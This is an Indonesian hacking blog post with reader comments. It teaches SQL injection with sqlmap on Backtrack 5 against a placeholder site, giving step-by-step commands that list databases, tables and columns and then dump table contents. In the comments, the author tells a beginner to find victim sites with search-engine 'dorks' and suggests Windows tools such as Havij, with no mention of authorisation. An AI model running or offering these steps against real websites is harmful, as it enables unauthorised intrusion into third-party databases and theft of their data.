http://a6.sphotos.ak.fbcdn.net/hphotos-ak-ash4/s720x720/400328_1847009871407_1725483864_1006930_1531705204_n.jpg






















Kali ini saya akan share sql injection di Backtrack 5 dengan menggunakan sqlmap...
silahkan dilihat Videonya , untuk penjelasan baca di bawah..
maaf  jika kurang jelas ataupun ada yg salah...karena sayapun masih belajar...







- untuk membuka sqlmap buka terminal ( ctrl + t ) ketikan perintah cd /pentest/database/sqlmap
- untuk mencari nama database : ./sqlmap.py -u http://www.targetanda.com/index.php?id=100 --dbs
-u = url , --dbs = mencari database
- untuk mencari nama tables :  ./sqlmap.py -u http://www.targetanda.com/index.php?id=100 -D namadatabase --tables
 - untuk mencari column ./sqlmap.py -u http://www.targetanda.com/index.php?id=100 -D namadatabase -T namatable --columns
- terakhir untuk melihat / mengambil isi dari table ./sqlmap.py -u http://www.targetanda.com/index.php?id=100 -D namadatabase -T namatable --dump


Semoga bermanfaat :)

10 komentar:

Polskahackrew mengatakan...

tutorial yang menarik sob.. tp video kabur sob,,

Dabllink mengatakan...

hmm udah d fullscreen?
kl kurang jlas , itu ada sy tulis perintah2nya :)

Anonim mengatakan...

ka, untuk cari tagetnya yg gimana dngan cara apa ???
newbie nih.......

Anonim mengatakan...

ka, untuk cari tagetnya yg gimana dngan cara apa ???
newbie nih.......

Dabllink mengatakan...

bisa menggunakan dork
untuk dorknya liat disini http://www.jakengnewbie.net/2011/11/dork-sql-injection.html

andikahnc mengatakan...

bro sql map di windows bisa ga ???
kalo bisa tolong kirimin sqlmap.py nya ke email ane andikahnc@gmail.com
thz ya

Malik Perang mengatakan...

terbaik bro.tutorial terbaik.salam perkenalan aku dari malaysia.:)

Dabllink mengatakan...

@andika : untuk pengguna windows banyak ko yg lbh mudah, seperti havij, sql injecter helper dll yg g kalah bagusnya :)

@malik : terimakasih sudah berkunjung :) salam kenal...

ontagrn mengatakan...

Mantap dan Zadizz.com. Salam kenal mas bro. hackandlock.wordpress.com

Dabllink mengatakan...

terimakasih kunjunannya kak :)

Posting Komentar

:)) :)] ;)) ;;) :D ;) :p :(( :) :( :X =(( :-o :-/ :-* : 8-} ~x( :-t b-( :-L x( =))

Copyright 2010 Blog Iseng
Suported by : Indonesia lost-c0de™ > ID-10t